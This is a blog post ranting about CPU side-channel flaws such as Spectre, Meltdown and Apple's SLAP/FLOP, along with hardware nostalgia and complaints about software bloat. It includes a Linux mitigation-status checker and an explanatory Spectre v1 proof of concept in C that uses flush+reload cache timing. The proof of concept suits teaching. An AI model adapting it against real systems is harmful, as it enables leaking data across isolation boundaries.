I am sick of the endless string of vulnerabilities caused by CPU design flaws. A recent sampler: Meltdown (2018), Spectre (v1, v2, v3, v4, v5, and SpectreRSB in 2018, SWAPGS in 2019, Spectre-STC in 2020, Spectre SRV aka v6 in 2023), Foreshadow (2018), ZombieLoad (2019), RIDL (2019), Fallout (2019), LazyFP (2018), TSX Asynchronous Abort (2019), CacheOut (2020), Retbleed (2022), ÆPIC Leak (2022), Hertzbleed (2022), SQUIP (2022), Downfall (2023), Zenbleed (2023), Inception (2023), Collateral Damage (2023), GhostRace (2023). The most publicized were, of course, Meltdown and Spectre: they actually made the general public aware that microprocessors are inherently vulnerable. No need for the dumb user to run some malware; and no way to fix such a vulnerability unless microcode updates, firmware patches, or OS-level software workarounds are issued and applied, some of which (especially the software workarounds) carry performance penalties as a trade-off.

Most of these vulnerabilities specifically affect Intel CPUs (Foreshadow, ZombieLoad, TSX Asynchronous Abort, Downfall, ÆPIC Leak), some are specific to AMD (SQUIP, Zenbleed, Inception), while others concern both platforms (Spectre v1, v2, v4, Retbleed, Hertzbleed, and partially Meltdown).

And now, even Apple’s own ARM CPUs are doomed!

I first read about this issue on BleepingComputer: New Apple CPU side-channel attacks steal data from browsers. These vulnerabilities are called SLAP and FLOP, and are described in more detail on predictors.fail (because they do!), where you’ll find two dozen links to articles on the web about SLAP and FLOP.

What you need to know:

The affected Apple devices are the following:

  • All Mac laptops from 2022-present (MacBook Air, MacBook Pro)
  • All Mac desktops from 2023-present (Mac Mini, iMac, Mac Studio, Mac Pro)
  • All iPad Pro, Air, and Mini models from September 2021-present (Pro 6th and 7th gen., Air 6th gen., Mini 6th gen.)
  • All iPhones from September 2021-present (All 13, 14, 15, and 16 models, SE 3rd gen.)

What you also need to know:

  • BleepingComputer: “Until security updates from Apple are made available, a possible mitigation would be to turn off JavaScript in Safari and Chrome, though this will expectedly break many websites.”
  • From the only comment on the same site: “Safari doesn’t have functional process & site isolation so it’s vulnerable. Chrome and Firefox do. Of those two, Firefox has the stronger implementation as they learned from Chrome’s mistakes. Sometimes there’s a benefit to being fashionably late after observing the mistakes the rushed arrivals make. On the other hand, it’s better to be late than never making it to the party at all, Safari.”

Apple might, or might not, issue fixes in a reasonable timeframe. And quite a few devices are affected!

I couldn’t be bothered to understand the exact mechanics of SLAP and FLOP, so I can’t tell whether the fixes are easy or close to impossible. I also don’t know how performance would be impacted. Judging by previous CPU vulnerabilities, anything can happen. For instance, the microcode update that patches Downfall significantly reduced the performance of some heavily vectorized workloads (and on CPUs for which no microcode mitigation is available, the kernel has to disable the AVX extensions entirely); the mitigation of Meltdown was even trickier (under Linux, kernel page-table isolation (KPTI) led to a reduction in CPU performance; macOS, iOS, Safari, and all supported Windows versions needed mitigation measures, and some AMD systems even failed to boot after the patches).
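
If you’re on Linux, you can at least see which of these mitigations your kernel has applied and at what cost. Here’s a minimal sketch in C, assuming a kernel that exposes its per-vulnerability status under /sys/devices/system/cpu/vulnerabilities/ (it has done so since the Meltdown/Spectre days); it simply prints each known vulnerability and what the kernel reports about it:

```c
/* List the kernel's reported CPU vulnerability/mitigation status.
 * Assumes Linux with /sys/devices/system/cpu/vulnerabilities/ present. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    const char *dirpath = "/sys/devices/system/cpu/vulnerabilities";
    DIR *dir = opendir(dirpath);
    if (!dir) {
        perror(dirpath);
        return 1;
    }

    struct dirent *entry;
    while ((entry = readdir(dir)) != NULL) {
        if (entry->d_name[0] == '.')
            continue;                               /* skip "." and ".." */

        char path[512], status[256] = "";
        snprintf(path, sizeof(path), "%s/%s", dirpath, entry->d_name);

        FILE *f = fopen(path, "r");
        if (!f)
            continue;
        if (fgets(status, sizeof(status), f))
            status[strcspn(status, "\n")] = '\0';   /* strip trailing newline */
        fclose(f);

        printf("%-28s %s\n", entry->d_name, status);
    }
    closedir(dir);
    return 0;
}
```

Depending on your CPU and kernel, you should see entries like “Mitigation: PTI” (Meltdown’s page-table isolation) or a blunt “Vulnerable” where no fix is in place.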

The root cause of all this is GREED. And the enabling mechanism is EXCESSIVE DESIGN COMPLEXITY. Just as Linus Torvalds himself admitted that no single person can truly understand how the Linux kernel works (speaking of complexity, the kernel has just surpassed 40 million lines of code), no single person can truly understand how a modern CPU works. But we need CPUs to run the code AS FAST AS POSSIBLE, so that poorly written software can behave acceptably! And just as ALL SOFTWARE currently in use has a HUGE NUMBER of unfixed bugs, the hardware is bug-ridden because of its OUT-OF-CONTROL complexity. Welcome to the 21st century!

Why is it that I call this “greed”?

Well, because such vulnerabilities only appeared once concepts like the following began to be applied to CPU design: Speculative Execution, Branch Prediction, Out-of-Order Execution, and Load Value Prediction.
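
To make this concrete, here’s a minimal sketch in C of the code pattern that Spectre v1 (the bounds-check bypass) abuses, assuming an x86-64 CPU and a compiler that provides <x86intrin.h>; the array names, the 1000-round loop, and the cycle threshold are my own illustrative choices, not anything taken from the SLAP/FLOP papers. The bounds check is architecturally correct; branch prediction plus speculative execution is what turns it into a leak, and a flush+reload cache-timing probe is how the leak is read out. A real exploit needs careful predictor training, noise filtering, and per-machine tuning; this only shows the shape of the problem:

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>              /* _mm_clflush, _mm_mfence, __rdtscp */

#define PROBE_STRIDE  4096          /* one page per value, to sidestep the prefetcher */
#define HIT_THRESHOLD 120           /* cycles; machine-dependent, tune for your CPU */

static uint8_t array1[16];                      /* all zeros: in-bounds accesses only warm line 0 */
static size_t  array1_size = 16;
static uint8_t probe[256 * PROBE_STRIDE];       /* the covert channel */
static const char *secret = "not architecturally reachable";

/* The Spectre v1 gadget: while the bounds check is still being resolved,
 * a trained branch predictor lets the CPU speculatively run both loads
 * with an out-of-bounds x, touching probe[secret_byte * PROBE_STRIDE]. */
static void victim(size_t x, volatile uint8_t *sink)
{
    if (x < array1_size)
        *sink = probe[array1[x] * PROBE_STRIDE];
}

int main(void)
{
    volatile uint8_t sink = 0;
    /* Out-of-bounds index chosen so that array1[x] aliases secret[0]. */
    size_t malicious_x = (size_t)((const uint8_t *)secret - array1);
    int scores[256] = {0};

    memset(probe, 1, sizeof(probe));            /* make sure the probe pages are mapped */

    for (int round = 0; round < 1000; round++) {
        /* Flush the probe array so any later cache hit must come from speculation. */
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe[i * PROBE_STRIDE]);
        _mm_mfence();

        /* Train the predictor with in-bounds calls, then slip in the malicious index. */
        for (int i = 0; i < 30; i++)
            victim(i % array1_size, &sink);
        victim(malicious_x, &sink);

        /* Flush+reload: time one access per candidate byte value. */
        for (int i = 1; i < 256; i++) {         /* skip 0: it is warmed by the training calls */
            unsigned int aux;
            volatile uint8_t *addr = &probe[i * PROBE_STRIDE];
            uint64_t t0 = __rdtscp(&aux);
            (void)*addr;
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt < HIT_THRESHOLD)
                scores[i]++;
        }
    }

    int best = 1;
    for (int i = 2; i < 256; i++)
        if (scores[i] > scores[best])
            best = i;
    printf("most-reloaded probe line: %d ('%c'), hits: %d/1000\n", best, best, scores[best]);
    return 0;
}
```

Note where the problem lives: not in the execution units doing the arithmetic, but in the machinery that guesses which way the branch will go and runs ahead of it.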

Modern CPUs dedicate an immense amount of logic and circuitry not to executing code directly, but to preparing, predicting, optimizing, and parallelizing its execution. Not counting the L1/L2/L3 cache, which can take ~30-60% of the die, the rest of the core area breaks down roughly as follows:

  • ~20-30% is dedicated to the Execution Units that handle the actual computations (arithmetic, logic, memory access, etc.).
  • ~50-70% is dedicated to the Instruction Optimizers (prediction tables, reservation stations, reorder buffers, and scheduling logic).

Unsurprisingly, ALL CPU vulnerabilities reside in the bloody Instruction Optimizers! On a modern CPU, only 10-20% of the cycles are executed in-order!

Branch prediction with speculative execution first appeared in x86-class CPUs with the introduction of the Intel Pentium Pro in 1995. The first-generation Pentium (P5), released in 1993, also included a very basic form of branch prediction, but without speculative execution. The last x86-class CPU without branch prediction was the Intel 80486 (i486), first released in 1989.

I was really, really happy with the CPUs of that era, used to run the software of the same period. Intel’s 80486DX4 went up to 100 MHz, while AMD’s Am486 DX4-120 ran at, obviously, 120 MHz (in 1995). AMD’s Am5x86-P75 ran at 133 MHz (it was a 486-class CPU equivalent in performance to a Pentium (P5) at 75 MHz), and the Am5x86-P100 ran at 160 MHz. On the cheaper side, there was the beloved Cyrix, a company that offered really affordable x86 clones, albeit under deceptive names: the 486SLC and 486DLC, despite what their names suggest, were pin-compatible with the 386SX and 386DX. The Cyrix Cx5x86 (a 486-class chip for Socket 3) ran at up to 120 MHz, and IBM’s 5x86C was a rebranding of it (IBM’s other Cyrix rebrands with “486” in the name were 386-class CPUs for 386 sockets, but with some 486-class features).

Back then (meaning before 1995 and not much after), believe it or not, there was plenty of useful and deeply satisfying software written for MS-DOS, for Windows 3.1 and Windows for Workgroups 3.11, and eventually for Windows 95. And it all ran on unbelievably low-spec hardware!

Nowadays, CPUs not only run at, say, 4 GHz instead of 100 MHz; thanks to their improved architecture, their performance is far higher than the frequency ratio alone would suggest: not 40 times better, but maybe 500 times better. Yet if you were to compare the speed of opening a graphical desktop and a text editor or a document editor on the following two classes of hardware, it’s not much faster now!

  • an i486-class CPU at 100 MHz, with 8 to 16 MB of RAM, running Windows 3.1, WfW 3.11, Win95, or the Linux distros available back then (or FreeBSD, NetBSD);
  • a modern CPU that can reach 2.5-4 GHz, with 8 to 16 GB of RAM, meaning 1,000x the RAM and a CPU that could perform ~500x better!

Such a CPU can perform much better than the frequency ratio because of its improved architecture, huge L1/L2/L3 cache and… Speculative Execution, Branch Prediction, Out-of-Order Execution, and Load Value Prediction! And yet, the computer doesn’t necessarily feel lightning fast, does it?

This phenomenon is often referred to as “software bloat” or “Wirth’s Law,” which humorously states: “Software gets slower more rapidly than hardware gets faster.” Or, in Niklaus Wirth’s exact words: “The hope is that the progress in hardware will cure all software ills. However, a critical observer may observe that software manages to outgrow hardware in size and sluggishness.”

That’s because modern operating systems and applications:

  • rely on multiple layers of abstraction (APIs, frameworks, virtual machines);
  • implement security by using sandboxing and other isolation mechanisms;
  • are often written in higher-level languages that are anything but fast to execute (including JavaScript and Python);
  • use frameworks and libraries that prioritize developer productivity over runtime efficiency;
  • are released quickly rather than thoroughly tested, especially as testing is increasingly difficult due to the architectural complexity;
  • are utterly bloated and inefficient!

Case in point:

  • Windows 95 required 4 MB of RAM to run, while Windows 11 requires at least 4 GB.
  • A contemporary web browser can easily use 1-2 GB of RAM to render a few tabs, because web content nowadays is not limited to HTML, CSS, images, and videos, but consists mainly of shitloads of crappy JavaScript!

I used a PC exactly like the one below, with an 80386SX/20 but only 1 MB of RAM (the hardware wasn’t cheap back then!), to run MS-DOS and Windows 3.1 (in Standard mode) impeccably! (Other than the occasional blue screens, because when an app or a driver crashed, the entire OS crashed.) 2 MB of RAM allowed Windows 3.1 to run in Enhanced mode, and 4 MB opened the door to Windows 95, Slackware 3.0, FreeBSD 2.0, and NetBSD 1.0.

I have to admit, though, that my first laptop, the entry-level HP OmniBook XE3, had a Celeron at 550 MHz (100 MHz FSB) and 64 MB of RAM. Way too much for Windows 98 SE!

When the Downfall CPU vulnerability was discovered in 2023, some people commented on LWN.net:

● Can we please just go back to Z80s and CP/M please thank you.

● I’ll have RISC-V instead, thank you very much.

● No good, pipelines and speculative stuff, just plain cycle-by-cycle normality.

● This is why I want my Z80 back.

● We know how non-speculative CPUs perform on modern manufacturing processes. The ARM Cortex-520 is in-order and the performance is not amazing. Similarly, Intel released the Quark a few years ago (port of the 486 to a modern process).

You wouldn’t be happy with a non-speculative CPU in your phone, let alone your laptop, desktop or server.

● I was perfectly happy on my MicroBee in 1984, I could be just as happy now.

● I’m still using a phone from 2011 and a netbook from 2009. Second and third battery (soon to be 4th 🙂

And maybe I’m not happy with having to wait a few seconds to switch apps, or the fact that Firefox no longer works on the phone because the CEO fired all the engineers to buy a 10th mansion, but I know I wouldn’t be any happier buying into the “10 copies of chrome and they all want to infantilise you and pick your pocket” way of life. Everyone there seems to be miserable.

● Maybe all this speculative execution stuff is a response to software and chip design going down a wrong path and chasing a local minimum at the top of a mountain …

From what I can make out, modern CPUs are “C language execution machines”, and C is written to take advantage of all these features with optimisation code up the wazoo.

Get rid of all this optimisation code, get rid of all this speculative silicon, start from scratch with sane languages and chips …

Sorry to get on the database bandwagon again, but I would love to go back 20 years, when I worked with databases that had snappy response times on systems with the hard disk going nineteen to the dozen. Yes the programmer actually has to THINK about their database design, but the result is a database that can start spewing results instantly the programmer SENDS the query, and a database that can FINISH the query faster than an RDBMS can optimise it …

Modern development techniques for web applications in particular have contributed to making application response time much worse than it used to be and orders of magnitude beyond what it was on much slower systems forty years ago. Wondering what went wrong and why no one seems to care if their page takes five or ten seconds to update is a relevant inquiry.

● Everyone is trying to solve their own tiny, insignificant task. And the fact that when all these non-solutions to non-problems, when combined, create something awful… who may even notice that, let alone fix that? Testers? They are happy if they have time to look on the pile of pointless non-problems in the bugtracker! Users? They are not the ones who pay for the software nowadays. Advertisers do that and they couldn’t care less about what users experience.

● You have to speculate heavily to get high single-thread performance, and single-thread performance will always matter because of Amdahl’s Law.

Some people commenting here claim they’d be happy with much lower performance. That’s fine, but most people find some Web sites and phone apps useful, and those need high single-thread performance.

● Nope. Not even close. Web sites would be equally sluggish no matter how many speculations your CPU does simply because there are no one who may care to make them fast.

If speculations would have been outlawed 10 or 20 years ago and all we had would have been fully in-order 80486 100MHz… they would have worked with precisely the same speed they work today on 5GHz CPUs.

The trick is that it’s easy to go from sluggish website on 80486 100MHz device to sluggish web site on 5GHz device, but it’s not clear how you can go back and if that’s even possible at all.

● My computer is idle waiting for user input 99% of the time. I might be happy with a slower, non-speculative CPU for most use. High-performance code for gaming or video decoding (or perhaps a kernel compile) can be explicitly tagged as less sensitive, and scheduled on a separate high-performance core. Indeed, CPU-intensive stuff is nowadays becoming GPU-intensive instead. It’s possible that in ten years, with number-crunching offloaded to the GPU, the evolutionary niche for big, superscalar CPUs will disappear.

If only it could speculatively run all that Javascript in anticipation of you clicking the button.

● All of these vulnerabilities exist because we have shared state in the hardware between two threads with different access rights; how far away is a world where we can afford to let some CPU cores be near-idle so that threads with different access rights don’t share state?

In theory, the CPU designers could fix this by tagging state so that different threads (identified to the CPU by PCID and privilege level) don’t share state, and by making sure that the partitioning of state tables between different threads changes slowly.

And also in theory, we could fix this in software by hard-flushing all core state at the beginning and end of each context switch that changes access rights (including user mode to kernel mode and back). However, this sort of state flushing is expensive on modern CPUs, because of the sheer quantity of state (branch predictors, caches, store buffers, load queues, and more).

Which leaves just isolation as the fix for high-performance systems; with enough CPU cores, you can afford the expensive state flush when a core switches access rights, and you can use message passing (e.g. io_uring) to ask a different core to do operations on your behalf.

● My laptop has over 500 tasks running, many of them for only short periods before going to sleep. My phone has similarly large numbers of tasks.

We don’t yet have thousands of cores, so we can’t simply assign each task to a core; we thus need to work out how to avoid having (e.g.) kernel threads and user threads sharing the same state. And note that because some state is outside the core (L2 cache, for example), it’s not just a case of “don’t share cores – neither sequentially nor concurrently” – depending on the paranoia level, you might want to reduce shared state further than that.
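
As an aside, the Amdahl’s Law argument invoked in one of the comments above is easy to quantify. If a fraction $p$ of a workload can be spread across $n$ cores while the rest stays serial, the overall speedup is bounded by:

$$S(n) = \frac{1}{(1 - p) + \dfrac{p}{n}}, \qquad \lim_{n \to \infty} S(n) = \frac{1}{1 - p}$$

Even with $p = 0.95$ and an unlimited number of cores, the speedup tops out at 20×; the serial 5% still runs at single-thread speed, and single-thread speed is exactly what branch prediction, out-of-order execution, and speculation were invented to buy.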

OK, so we’re doomed. (“OK, Boomer!”)

The irony is that Apple’s vulnerable CPUs are ARM, hence RISC, not CISC. Progress sometimes means going back to older principles. (Back in the day, the migration was from CISC to RISC, not the other way around.) But wait, shouldn’t RISC CPUs, in principle, be less prone to such bugs than CISC CPUs?

Umm, no. Apple’s M3, M4, and A17 Pro CPUs are highly complex and “optimized for performance,” which can (and will!) introduce security risks. While RISC architectures were originally designed to be simpler than CISC architectures like x86, the reality is that modern RISC CPUs include many of the same performance-enhancing features (speculative execution, branch prediction, out-of-order execution, load value prediction) that make them susceptible to similar vulnerabilities.

But this CPU madness that leads to such vulnerabilities is nothing compared to the GPU madness! Gen Z can’t possibly know, because they’re the generation that uses water-cooled or nitrogen-cooled video cards. Why? Because insane arrays of GPUs are increasingly “needed” not for games, not for graphics or video processing, but for crypto mining or for running LLM AI engines locally!

Around 1990 and through 1995, most video cards were little more than frame buffers: VRAM holding the displayed image, plus the circuitry to scan it out to the monitor! They were essentially framebuffer devices with limited acceleration capabilities. Any complex calculations, such as transformations, shading, or even simple 2D rendering, were primarily handled by the CPU (and the FPU, if present). And, I’m sorry to say, there were many fabulous MS-DOS games able to run with a VGA or VESA card having 256 KB (yeah, that’s KB) of video memory and no GPU in the modern sense of the term! At best, high-end 2D graphics cards (like those from Tseng Labs, ATI, S3, or Matrox) included basic BitBLT (bit block transfer) acceleration, line drawing, and some hardware-assisted text and GUI operations to speed up Windows and DOS applications. But full-on graphics processing as we think of it today was still a few years away.

What people are doing with both hardware and software these days can be described as the work of a sorcerer’s apprentice:

A person who experiments carelessly, without paying attention to the possible consequences of their experiments, and without the ability to contain them should they spiral out of control.

Or, as the French put it, jouer à l’apprenti-sorcier ― literally, to play the sorcerer’s apprentice; loosely, to play God.

Stick your fucking stupid hardware and software up your asses!